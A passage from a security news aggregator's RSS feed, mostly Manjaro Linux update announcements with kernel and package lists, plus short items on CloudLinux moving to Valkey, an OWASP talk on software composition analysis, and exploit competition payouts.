</ul>
<h2><a name="p-817548-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-817548-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2025-10-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2025-10-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.63</li>
<li>linux617 6.17.13 [EOL]</li>
<li>linux618 6.18.2</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (12/18/25 18:52)</p>
<ul>
<li>testing core x86_64:  25 new and 22 removed package(s)</li>
<li>testing extra x86_64:  1258 new and 1254 removed package(s)</li>
<li>testing multilib x86_64:  11 new and 11 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1173/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2025-10-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2025-10-18-kernels-systemd-cinnamon-pacman-vulkan-sdk/184077">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Transitioning from Redis to Valkey in CloudLinux OS]]></title>
<description><![CDATA[Changes to core infrastructure can raise understandable questions, especially around compatibility and operational impact. That's why we are writing this post today.]]></description>
<link>https://tsecurity.de/de/3167275/unix-server/transitioning-from-redis-to-valkey-in-cloudlinux-os/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3167275/unix-server/transitioning-from-redis-to-valkey-in-cloudlinux-os/</guid>
<pubDate>Thu, 18 Dec 2025 16:00:56 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://blog.cloudlinux.com/transitioning-from-redis-to-valkey-in-cloudlinux-os" title="" class="hs-featured-image-link"> <img src="https://blog.cloudlinux.com/hubfs/Valkey%20in%20CloudLinux%20OS.png" alt="Transitioning from Redis to Valkey in CloudLinux OS" class="hs-featured-image"> </a> 
</div> 
<p><span>Changes to core infrastructure can raise understandable questions, especially around compatibility and operational impact. That's why we are writing this post today.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The SCA Balancing Act]]></title>
<description><![CDATA[Author: OWASP Foundation - Bewertung: 0x - Views:0 Software Composition Analysis (SCA) is among the most foundational approaches to application security. Understanding the known vulnerabilities, leading and lagging indicators of risk are among the most widely leveraged security controls in indust...]]></description>
<link>https://tsecurity.de/de/3161419/it-security-video/the-sca-balancing-act/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3161419/it-security-video/the-sca-balancing-act/</guid>
<pubDate>Tue, 16 Dec 2025 07:17:26 +0100</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: OWASP Foundation - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/St1CrNS6OuM?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Software Composition Analysis (SCA) is among the most foundational approaches to application security. Understanding the known vulnerabilities, leading and lagging indicators of risk are among the most widely leveraged security controls in industry. There are three major types of SCA: Runtime SCA, Manifest scanning SCA and Build/Install-time SCA with and without program analysis. Each approach comes with hidden costs and pros and cons along the way. This session will explore not only the hidden costs, pros and cons but explain why they exist. We will round out with effective practices, classes of vulnerabilities that are covered and things to avoid with each approach. Everyone has heard that there is a panacea for managing risk in software composition analysis. You see this in marketing every day. This nirvana is a lie. But there could be a nirvana for you in your context. This talk explores the spectrum of trade offs that exist.<br />
<br />
Jamie Scott<br />
Endor Labs<br />
Product Manager<br />
Santa Clara, CA<br />
<br />
https://x.com/iamateapot418<br />
https://www.linkedin.com/in/james-m-scott-iii<br />
<br />
Jamie Scott, CISSP, CCSP is a recovering cybersecurity practitioner turned product manager building the next generation of dependency management solutions at Endor Labs. Previously Jamie was Product Manager at Redis and StackRox (Acquired by Red Hat in Feb 2021) where he was an open source contributor and leader for both projects. Jamie remains an active contributor to the cybersecurity community as co-author and contributor to several benchmarks as a volunteer consultant for the Center for Internet Security.<br />
<br />
Managed by the OWASP® Foundation<br />
https://owasp.org/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2025-12-15 - Kernels, NVIDIA, Plasma, Cosmic, Firefox]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).
We managed to stabilize ‘Anh-Linh’ enough to release this update to ...]]></description>
<link>https://tsecurity.de/de/3158906/unix-server/stable-update-2025-12-15-kernels-nvidia-plasma-cosmic-firefox/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3158906/unix-server/stable-update-2025-12-15-kernels-nvidia-plasma-cosmic-firefox/</guid>
<pubDate>Mon, 15 Dec 2025 06:00:50 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).</p>
<p>We managed to stabilize ‘Anh-Linh’ enough to release this update to our <strong>stable</strong> branch. <mark>However, users of <strong>Plasma</strong> and <strong>GNOME</strong> may lose their <strong>X11</strong> session support. Therefore read our <strong><a href="https://forum.manjaro.org/t/stable-update-2025-12-08-25-1-anh-linh-preview/183479#p-812262-known-issues-and-solutions-1">Known issues and solutions</a> section</strong> before restarting your systems! </mark></p>
<h3><a name="p-815676-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-815676-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-815676-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-815676-recent-news-2"></a>Recent News</h2>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.17 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/stable-update-2025-12-15-kernels-nvidia-plasma-cosmic-firefox/183888/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/stable-update-2025-12-15-kernels-nvidia-plasma-cosmic-firefox/183888/1">(click for more details)</a>
<h2><a name="p-815676-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-815676-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong> got updated</li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/259042/">580.119.02</a>
<ul>
<li>current 580xx driver seems to be super unstable. Users who face issues are recommended to <a href="https://forums.developer.nvidia.com/t/580-release-feedback-discussion/341205">report to NVIDIA</a> and may want to switch to the older 575xx driver via <strong>mhwd</strong>. You’re been warned …</li>
</ul>
</li>
<li><strong>COSMIC</strong> <a href="https://blog.system76.com/post/pop-os-letter-from-our-founder">Epoch 1</a></li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/25.12.0/">25.12</a></li>
<li><strong>KDE Plasma</strong> <a href="https://kde.org/announcements/plasma/6/6.5.4/">6.5.4</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/146.0/releasenotes/">146.0</a> and <a href="https://www.firefox.com/en-US/firefox/147.0beta/releasenotes/">147.0b1</a></li>
<li>Updates to <strong>Deepin</strong>, <strong>Python</strong> and <strong>Haskell</strong></li>
</ul>
<h2><a name="p-815676-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-815676-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/stable-update-2025-12-15-kernels-nvidia-plasma-cosmic-firefox/183888/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2025-12-15-kernels-nvidia-plasma-cosmic-firefox/183888/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<p>ISOs including this update can be found here:</p>
<p><strong>Anh-Linh 25.1-pre2</strong> (2025-12-15)</p>
<ul>
<li>TBD</li>
</ul>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.62</li>
<li>linux617 6.17.12</li>
<li>linux618 6.18.1</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.119_rt67</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (12/12/25 17:36 CET)</p>
<ul>
<li>stable core x86_64:  20 new and 20 removed package(s)</li>
<li>stable extra x86_64:  936 new and 1069 removed package(s)</li>
<li>stable multilib x86_64:  7 new and 7 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1172/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/stable-update-2025-12-15-kernels-nvidia-plasma-cosmic-firefox/183888/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2025-12-15-kernels-nvidia-plasma-cosmic-firefox/183888">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2025-12-13 - KDE Gear, Cosmic 1, NVIDIA]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).
Current Promotions

Get the latest Gaming Laptop by Slimbook powered...]]></description>
<link>https://tsecurity.de/de/3156521/unix-server/testing-update-2025-12-13-kde-gear-cosmic-1-nvidia/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3156521/unix-server/testing-update-2025-12-13-kde-gear-cosmic-1-nvidia/</guid>
<pubDate>Sat, 13 Dec 2025 06:00:55 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).</p>
<h3><a name="p-814754-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-814754-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-814754-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-814754-recent-news-2"></a>Recent News</h2>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.17 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2025-12-13-kde-gear-cosmic-1-nvidia/183785/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2025-12-13-kde-gear-cosmic-1-nvidia/183785/1">(click for more details)</a>
<h2><a name="p-814754-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-814754-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/259042/">580.119.02</a></li>
<li><strong>COSMIC</strong> <a href="https://blog.system76.com/post/pop-os-letter-from-our-founder">Epoch 1</a></li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/25.12.0/">25.12</a></li>
</ul>
<h2><a name="p-814754-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-814754-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2025-12-13-kde-gear-cosmic-1-nvidia/183785/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2025-12-13-kde-gear-cosmic-1-nvidia/183785/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.62</li>
<li>linux617 6.17.12</li>
<li>linux618 6.18.1</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (12/12/25 17:36 CET)</p>
<ul>
<li>testing core x86_64:  18 new and 18 removed package(s)</li>
<li>testing extra x86_64:  710 new and 741 removed package(s)</li>
<li>testing multilib x86_64:  5 new and 5 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1171/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2025-12-13-kde-gear-cosmic-1-nvidia/183785/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2025-12-13-kde-gear-cosmic-1-nvidia/183785">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[$320,000 Paid Out at Zeroday.Cloud for Open Source Software Exploits]]></title>
<description><![CDATA[Participants earned rewards at the hacking competition for Grafana, Linux Kernel, Redis, MariaDB, and PostgreSQL vulnerabilities.
The post $320,000 Paid Out at Zeroday.Cloud for Open Source Software Exploits appeared first on SecurityWeek.]]></description>
<link>https://tsecurity.de/de/3154643/it-security-nachrichten/320000-paid-out-at-zerodaycloud-for-open-source-software-exploits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3154643/it-security-nachrichten/320000-paid-out-at-zerodaycloud-for-open-source-software-exploits/</guid>
<pubDate>Fri, 12 Dec 2025 08:54:23 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Participants earned rewards at the hacking competition for Grafana, Linux Kernel, Redis, MariaDB, and PostgreSQL vulnerabilities.</p>
<p>The post <a href="https://www.securityweek.com/320000-paid-out-at-zeroday-cloud-for-open-source-software-exploits/">$320,000 Paid Out at Zeroday.Cloud for Open Source Software Exploits</a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2025-12-09 - Plasma 6.5.4, Firefox, Deepin, Python, Haskell]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).
Current Promotions

Get the latest Gaming Laptop by Slimbook powered...]]></description>
<link>https://tsecurity.de/de/3148894/unix-server/testing-update-2025-12-09-plasma-654-firefox-deepin-python-haskell/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3148894/unix-server/testing-update-2025-12-09-plasma-654-firefox-deepin-python-haskell/</guid>
<pubDate>Tue, 09 Dec 2025 20:30:49 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).</p>
<h3><a name="p-812823-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-812823-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-812823-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-812823-recent-news-2"></a>Recent News</h2>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.17 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2025-12-09-plasma-6-5-4-firefox-deepin-python-haskell/183572/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2025-12-09-plasma-6-5-4-firefox-deepin-python-haskell/183572/1">(click for more details)</a>
<h2><a name="p-812823-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-812823-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li><strong>KDE Plasma</strong> <a href="https://kde.org/announcements/plasma/6/6.5.4/">6.5.4</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/146.0/releasenotes/">146.0</a> and <a href="https://www.firefox.com/en-US/firefox/147.0beta/releasenotes/">147.0b1</a></li>
<li>Updates to <strong>Deepin</strong>, <strong>Python</strong> and <strong>Haskell</strong></li>
</ul>
<h2><a name="p-812823-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-812823-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2025-12-09-plasma-6-5-4-firefox-deepin-python-haskell/183572/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2025-12-09-plasma-6-5-4-firefox-deepin-python-haskell/183572/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.61</li>
<li>linux617 6.17.11</li>
<li>linux618 6.18.0</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (12/9/25 19:20 CET)</p>
<ul>
<li>testing core x86_64:  2 new and 2 removed package(s)</li>
<li>testing extra x86_64:  348 new and 450 removed package(s)</li>
<li>testing multilib x86_64:  2 new and 2 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1170/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2025-12-09-plasma-6-5-4-firefox-deepin-python-haskell/183572/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2025-12-09-plasma-6-5-4-firefox-deepin-python-haskell/183572">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2025-12-08 - 25.1 Anh-Linh Preview]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).
Current Promotions

Get the latest Gaming Laptop by Slimbook powered...]]></description>
<link>https://tsecurity.de/de/3145842/unix-server/stable-update-2025-12-08-251-anh-linh-preview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3145842/unix-server/stable-update-2025-12-08-251-anh-linh-preview/</guid>
<pubDate>Mon, 08 Dec 2025 16:15:51 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).</p>
<h3><a name="p-812260-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-812260-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-812260-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-812260-recent-news-2"></a>Recent News</h2>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.17 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/stable-update-2025-12-08-25-1-anh-linh-preview/183479/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/stable-update-2025-12-08-25-1-anh-linh-preview/183479/1">(click for more details)</a>
<h2><a name="p-812260-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-812260-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>TBD</li>
</ul>
<h2><a name="p-812260-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-812260-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/stable-update-2025-12-08-25-1-anh-linh-preview/183479/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2025-12-08-25-1-anh-linh-preview/183479/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.61</li>
<li>linux617 6.17.11</li>
<li>linux618 6.18.0</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (12/7/25 23:59 CET)</p>
<ul>
<li>stable core x86_64:  152 new and 152 removed package(s)</li>
<li>stable extra x86_64:  7048 new and 7233 removed package(s)</li>
<li>stable multilib x86_64:  110 new and 130 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1169/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/stable-update-2025-12-08-25-1-anh-linh-preview/183479/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>1 post - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2025-12-08-25-1-anh-linh-preview/183479">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2025-12-07 - Kernels, Cosmic, Mesa, ROCm, Gambas]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).
Current Promotions

Get the latest Gaming Laptop by Slimbook powered...]]></description>
<link>https://tsecurity.de/de/3144200/unix-server/testing-update-2025-12-07-kernels-cosmic-mesa-rocm-gambas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3144200/unix-server/testing-update-2025-12-07-kernels-cosmic-mesa-rocm-gambas/</guid>
<pubDate>Sun, 07 Dec 2025 19:45:46 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0 (Beta).</p>
<h3><a name="p-812109-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-812109-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
